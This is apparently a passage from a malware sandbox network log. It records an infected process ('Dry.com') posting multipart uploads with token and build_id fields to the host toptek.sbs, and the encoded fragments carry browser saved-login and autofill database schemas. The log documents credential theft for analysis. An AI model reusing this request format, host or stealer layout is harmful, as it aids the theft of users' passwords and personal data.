                                                                                                                                                                                                                                                                                  2024-12-23 05:21:43 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:43 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:43 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:43 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:43 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:43 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:43 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:45 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:21:45 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  13192.168.2.44976994.130.188.574437548C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:44 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----US0R9RI58YM7YMGLX4W4
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                  Content-Length: 55081
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:44 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 55 53 30 52 39 52 49 35 38 59 4d 37 59 4d 47 4c 58 34 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 55 53 30 52 39 52 49 35 38 59 4d 37 59 4d 47 4c 58 34 57 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 55 53 30 52 39 52 49 35 38 59 4d 37 59 4d 47 4c 58 34 57 34 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                  Data Ascii: ------US0R9RI58YM7YMGLX4W4Content-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------US0R9RI58YM7YMGLX4W4Content-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------US0R9RI58YM7YMGLX4W4Cont
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:44 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:44 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:44 UTC6016OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:46 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                  Date: Mon, 23 Dec 2024 05:21:46 GMT
                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:46 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                  14192.168.2.44977094.130.188.574437548C:\Users\user\AppData\Local\Temp\245347\Dry.com
                                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:47 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----G47GLNG4OZU3EU3OZC26
                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                  Host: toptek.sbs
                                                                                                                                                                                                                                                                                  Content-Length: 142457
                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:47 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 47 34 37 47 4c 4e 47 34 4f 5a 55 33 45 55 33 4f 5a 43 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 36 63 39 39 62 34 65 61 31 31 30 37 64 36 37 37 38 31 65 31 33 32 62 32 39 36 63 64 33 32 0d 0a 2d 2d 2d 2d 2d 2d 47 34 37 47 4c 4e 47 34 4f 5a 55 33 45 55 33 4f 5a 43 32 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 61 64 62 35 65 35 31 65 62 65 33 62 61 31 32 61 66 62 37 66 62 65 36 32 34 64 31 32 61 32 62 0d 0a 2d 2d 2d 2d 2d 2d 47 34 37 47 4c 4e 47 34 4f 5a 55 33 45 55 33 4f 5a 43 32 36 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                  Data Ascii: ------G47GLNG4OZU3EU3OZC26Content-Disposition: form-data; name="token"a66c99b4ea1107d67781e132b296cd32------G47GLNG4OZU3EU3OZC26Content-Disposition: form-data; name="build_id"dadb5e51ebe3ba12afb7fbe624d12a2b------G47GLNG4OZU3EU3OZC26Cont
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:47 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                  Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                  2024-12-23 05:21:47 UTC16355OUTData Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56
                                                                                                                                                                                                                                                                                  Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
